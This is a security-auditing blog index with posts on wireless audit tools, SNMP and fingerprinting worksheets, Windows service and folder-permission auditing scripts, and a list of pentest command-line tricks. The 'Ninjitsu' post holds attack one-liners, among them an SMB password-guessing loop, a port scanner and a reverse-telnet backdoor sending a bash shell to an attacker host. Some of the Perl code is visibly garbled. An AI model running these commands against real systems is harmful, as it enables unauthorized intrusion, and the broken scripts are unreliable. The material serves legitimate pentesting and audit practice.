Nokia N810 – Wireless Auditing

 Configuration Tutorials, Installing & Using Tools, Using the Tools  No Responses »
Sep 082011
 

I created a tutorial on how to setup and configure the Nokia N810 Internet Tablet to conduct a wireless assessment or audit. The tools included in the tutorial include how to setup kismet (oldcore and newcore), aircrack-ng (airbase and aircrack), and btscanner. I’m still working on developing steps to install Metasploit and Karmetasploit for wireless client attacks. The tutorial also details using the internal GPS as well as adding an external wireless adapter. The latest version of the tutorial can be found here.

 Posted by admin at 6:52 am  Tagged with: , , , , ,

SNMP Assessment Worksheet

 Configuration Tutorials, Installing & Using Tools, Scripts, Using the Tools  1 Response »
Jun 072011
 

I put together another Technical Assessment Plan for assessing the SNMP protocol.  You will use open source and freely download-able utilities to assess the SNMP protocol.  This is for auditors that do not have access to or cannot afford the Solarwinds toolset.  This is version 0.1 of the document and I plan on making updates and add new tools in the future.

 Posted by admin at 5:50 pm  Tagged with:

External Fingerprinting Worksheet

 Configuration Tutorials, Installing & Using Tools, Scripts, Using the Tools  No Responses »
Feb 242011
 

I put together a Technical Assessment Plan that can be used to conduct external fingerprinting using the tools and utilities that a penetration tester would use.  The assessment plans are structured in a way to help with the documentation of evidence for inclusion in a work-paper process.  The plan provides helpful information on how to install, configure, and use the tools to obtain the evidence needed for an engagement.  The Technical Assessment Plans that I have created can be found here.

 Posted by admin at 8:46 pm  Tagged with: , , , , , , , , , ,

SQLNINJA: SQL Injection

 Configuration Tutorials, Installing & Using Tools, Scripts, Using the Tools  No Responses »
Jun 042009
 

On a recent pentest I was able to use SQLNINJA to exploit a SQL Injection vulnerability I had identified.  I documented the steps I took so that future auditors can take advantage of this tool.  Check out the tutorial here.

 Posted by admin at 7:54 am  Tagged with: , , , , , , , , , , ,

Auditing Remote Services from the Command Line

 Scripts, Using the Tools  No Responses »
Mar 062009
 

During an audit I had to determine whether a particular remote control service was installed on the Domain workstations and servers. It was determined during the interview process that no remote control software was in use.  I decided to obtain the evidence to the contrary.  I had already compromised a Domain Administrator account so I had the appropriate permissions.

Get a list of servers and workstations.
C:\>net view /domain
C:\>net view /domain:<domain_name> >> host_list.txt

The host_list.txt will need to be edited as descriptions of the workstations and servers will show up to the right of the host name. You can quickly edit it in Excel (text to columns). Of course if this was Linux and /or you had awk you could pipe it and choose the first column (| awk ‘{print $1}’)

The command we will be using to query remote services is called Service Control (sc) from the Windows Resource Kit.  For more information on the command see this site.

C:\>for /f %i in (host_list.txt) do @echo %i >> results.txt && sc %i query <Service_Name>

In addition to the service results I would like to have the fully qualified domain name and ip address of the server or workstation I am querying.  A quick addition of the nslookup command you and you get this:

C:\>for /f %i in (host_list.txt) do @nslookup %i >> results.txt && sc %i query <Service_Name> >> results.txt

Finally, I would like to know, with reasonable assurance, the user of that workstation.  For that we will be using a command line tool from the pstools tool kit called psloggedin.  Once that tool is installed on your auditor workstation/laptop you can add it to our command.

C:\>for /f %i in (host_list.txt) do @nslookup %i >> results.txt && sc %i query <Service_Name >> results.txt && psloggedin -l -x %i >> results.txt

I wrote a quick script to parse the output of the above command so it can be sorted and analyzed in your preferred spreadsheet application.


#!/usr/bin/perl

$numArgs = $#ARGV +1;
if($numArgs &lt; 1){
  print "Invalid Number of Arguments\n";
  print "serviceparse.pl \n\n";
  exit;
}

#open the file
$infile = "$ARGV[0]";
open(DAT, $infile) || die("Something did not work.  You figure it out.");

#save file contents into an array
@raw_data=;
close(DAT);

#Cycle through the entire array
for($count=0;$count&lt;=$#raw_data;$count++){

  #get fully qualified domain name
  if(@raw_data[$count] =~ /Name:/){
    @array = split(/:/, @raw_data[$count]);
    $host = @array[1];
    $host =~ s/^s+//;
    $host =~ s/s+$//;

    #get ip address
    @array = split(/:/, @raw_data[$count+1]);
    $ip = @array[1];
    $ip =~ s/^s+//;
    $ip =~ s/s+$//;

    $service = "";
    $user = "";
    for($c=$count+1;$c&lt;=$#raw_data;$c++){

      if(@raw_data[$c] =~ /RUNNING/){
        $service = "Installed and Running";
      }
      if(@raw_data[$c] =~ /STOPPED/){
        $service = "Installed and Stopped";
      }
      if(@raw_data[$c] =~ /FAILED 1722/){
        $service = @raw_data[$c+2];
        $service =~ s/^s+//;
        $service =~ s/s+$//;
      }
      if(@raw_data[$c] =~ /FAILED 1060/){
        $service = @raw_data[$c+2];
        $service =~ s/^s+//;
        $service =~ s/s+$//;
      }

      if(@raw_data[$c] =~ /locally:/){
        @array = split(//, @raw_data[$c+3]);
        $user = @array[1];
        $user =~ s/^s+//;
        $user =~ s/s+$//;
      }else {if(@raw_data[$c] =~ /Error opening HKEY_USERS/){$user = "";}}

      if(@raw_data[$c] =~ /Server:/){print "$host,$ip,$service,$user\n";last;}
    }
  }
}

Run this script from the command line and pipe it to save the output.

$perl serviceparse.pl results.txt > parseresults.csv

 Posted by admin at 8:06 am  Tagged with: , , , , , , , ,

Auditing Folder (and subfolder) Permissions using CACLS

 Scripts, Using the Tools  1 Response »
Mar 062009
 

CACLS.exe is a great builtin Windows utility that allows you to list the permissions on a file or folder.  This command has been used in an audit to get the permissions of the folders on an agency file server that served the “private” shares to each Domain user.  The findings we would be looking for when examining the results are improper access to the “private” shares by other Domain users.

For CACLS options and how to interpret the results see this site.

The commands that I run are as follows:
Directories and Files in the folder your run CACLS
c:\>for /f "delims=" %a in ('dir /b') do @cacls "%a" >> savefile.txt
All directories, recursive, from the folder your run CACLS
c:\>for /f "delims=" %a in ('dir /b /S /A:D') do @cacls "%a" >> savefile.txt

Once results are obtained they need to be parsed so they can be analyzed.  I have written a perl script to add the correct folder name to each permission.  This is so they can be sorted by permission in your spreadsheet application of choice.

 

Save the code and run it as follows (also download here):


#!/usr/bin/perl

$numArgs = $#ARGV +1;
if($numArgs < 2){ 
  print "Invalid Number of Arguments\n";
  print "caclsparse.pl <filename> <foldername>\n";
  print "The foldername is the root folder you ran CACLS.exe from.\n\n";
  print "foldername example:  \"C:\\\\Documents and Settings\\\\jedge\"\n";
  print "Folder names with spaces need to be encapsulated in quotes.\n";
  print "You need to escape the backslash twice.\n";
  exit;
}

#open the file
$infile = "$ARGV[0]";
open(DAT, $infile) || die("Something did not work.  You can email me at james.edge(at)jedge.com\n");

#save file contents into an array
@raw_data=<DAT>;
close(DAT);

open (OUTPUT, '>cacls_parse_output.csv');
#Cycle through the entire array
for($count=0;$count<=$#raw_data;$count++){
  
  #pull folder name, split it, and print it
  #the first record in each grouping is the only record with the folder name
  if(@raw_data[$count] =~ /($ARGV[1])/){
    $x = 0;
    while(substr(@raw_data[$count+1],$x,1) eq " "){
      $x++;
    }
    $folder = substr(@raw_data[$count],0,$x-1);
    $permissions = substr(@raw_data[$count],$x,length(@raw_data[$count]) - $x);
    print OUTPUT "\"$folder\",\"$permissions\"\n";
        
    #cycle through the permissions listed below the folder name
    for($c=$count+1;$c<=$#raw_data;$c++){
      
      #clear all whitespace
      $permissions = substr(@raw_data[$c],$x,length(@raw_data[$c]) - $x);
      $permissions =~ s/^s+//;
      $permissions =~ s/s+$//;   
    chomp($permissions);chomp($permissions);
      
      #print until you get to the next folder item
      if(@raw_data[$c] =~ /($ARGV[1])/){last;}
      print OUTPUT "\"$folder\",\"$permissions\"\n";
    }
  }
}
close(OUTPUT);

$perl caclsparse.pl savefile.txt C:\\Documents and Settings\\jedge

NOTE: I run it from Linux but ActivePerl for Windows will work as well. Installing perl is outside the scope of this posting.

Open parseresults.csv in Excel/OO Calcs/Gnumeric and begin analyzing the results!

 Posted by admin at 7:13 am  Tagged with: , , , , , , ,

Penetration Testing Ninjitsu

 FYI, Installing & Using Tools, Scripts, Using the Tools  1 Response »
Dec 022008
 

Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (http://www.coresecurity.com/content/webcast-series-with-sans).  I highly recommend listening to these web casts and downloading the slides for your reference.  I’m including the commands extracted from the slides that can be very useful for a penetration test.

Ninjitsu I

Ping Sweep
C:\> for /L %i in (1,1,255) do @ping –n 1 10.10.10.%i | find “Reply”

Reverse DNS Lookup
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

Dictionary Attack
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)

Ninjitsu II

Linux Command-Line Port Scanner
$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done

Linux Command-Line Backdoor via “Reverse Telnet”
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]

The Windows Command Line Port Scanner Using FTP Client
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Windows Command-Line File Transfer
C:\> type [filename] > \\[machine]\[share]\[filename]

Backdoors: The File Shell
C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

Ninjitsu III

Wireless Sniffing
C:\> for /L %i in (1,0,2) do @(netsh interface set interface “wireless network connection” disable & ping –n 3 127.0.0.1 >nul & netsh interface set interface “wireless network connection” enable & ping –n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)

Install Telnet Client Vista
C:\> pkgmgr /iu:"TelnetClient"

Install Telnet Server Vista
C:\> pkgmgr /iu:"TelnetServer"

Install IIS 7.0
C:\> pkgmgr /iu:IIS-WebServerRole;WASWindowsActivationService;WAS-ProcessModel;WASNetFxEnvironment;WAS-ConfigurationAPI

List Domain Password Settings
C:\>net accounts /domain

 Posted by admin at 12:08 pm  Tagged with: , , , , ,
© 2012 Information Systems Auditing Suffusion theme by Sayontan Sinha